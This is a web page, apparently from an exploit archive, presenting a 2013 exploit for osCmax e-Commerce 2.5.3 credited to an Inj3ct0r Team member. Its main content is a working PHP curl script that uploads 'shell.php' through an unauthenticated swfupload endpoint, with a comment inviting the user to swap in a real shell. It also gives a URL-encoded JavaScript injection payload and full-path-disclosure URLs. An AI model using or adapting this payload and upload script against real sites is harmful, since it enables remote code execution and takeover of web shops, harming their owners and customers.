exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

osCmax e-Commerce 2.5.3 Cross Site Scripting / Shell Upload

osCmax e-Commerce 2.5.3 Cross Site Scripting / Shell Upload
Posted Dec 9, 2013
Authored by KedAns-Dz

osCmax e-Commerce version 2.5.3 suffers from cross site scripting and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss
SHA-256 | 98860934dd3a5b358b5cfd2a7330aad09c77227902a99dc4747915d3109cca00

osCmax e-Commerce 2.5.3 Cross Site Scripting / Shell Upload

Change Mirror Download
<?/**
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[>] Title : osCmax e-Commerce v2.5.3 (FU/ObjectInject) Multiple Vulnerabilities

[>] Author : KedAns-Dz
[+] E-mail : ked-h (@hotmail.com / @1337day.com)
[+] FaCeb0ok : fb.me/Inj3ct0rK3d
[+] TwiTter : @kedans

[#] Platform : PHP / WebApp
[+] Cat/Tag : Multiple , File/shell Upload , Object Injection

[<] <3 <3 Greetings t0 Palestine <3 <3
[>] <3 R.I.P NelsOn MandEla <3

[ps]:
Algeria vs Russia o.O Brazil 2014 ... u think a HaCk-WAR be coming !!?
LOL héhéhé we are brothers in the Cyber NetWork ^__^ <3 Russia <3
1,2,3 Viva l'Algerie | 4,5,6 we fall in love with Russian GIRL's xD lol.
> Give me a algerian , and Korian-Car & Russian Weapon & European Enemy
> see result : (http://static.echoroukonline.com/ara/files/2012/baki_tintin_967504998.jpg)

#####
# [!] Description :
#
# P.O.C :
# - [ CVE-2013-4144 , CVE-2013-4145 , CVE-2013-4146 ]
# - [ OSVDB-92635 ] [ 1337day-2013-20669 ]
# - [ new 0day ]
#
# osCmax e-Commerce v2.5.3 is suffer from multiple vulnerabilities
# remote attacker can upload file/shell via header attacks or exec
# a JavaScript Code & Inject a remote Object ( see also : CVE-2013-4144 )
#####
# [+] Exploit (1) ' Object Injection / JS Injection ' : [ CVE-2013-4144 , OSVDB-92635 ( also found by me :p )]
#
# JS alert() Code : %22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;//
#
# http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?movieName=[ JS Code ]
# http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?buttonImageURL=[ Object/Image URL ]
#
#####
# [+] Exploit (2) ' Full Path Disclosure ' :
# http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.php
# http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.simple.php
#####
# [+] Exploit (3) ' File/shell Upload ' :
#**/?>

<?php
#-----------------------------------------------------------------------------
$headers = array("Content-Type: application/octet-stream",
"Content-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"");
#-----------------------------------------------------------------------------
$shell="<?php phpinfo(); ?>"; # U'r Sh3lL h3re !
$path ="/temp/"; # Sh3lL Path
#-----------------------------------------------------------------------------
$ch = curl_init("http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$shell",
'uploadpath'=>"@$path"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
#-----------------------------------------------------------------------------
?>

# [!] find file : /temp/shell.php

<?/**
####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , &
# & KnocKout , Angel Injection , The Black Devils , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####
**/?>

# 1337day.com id:[1337day-2013-21633]
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close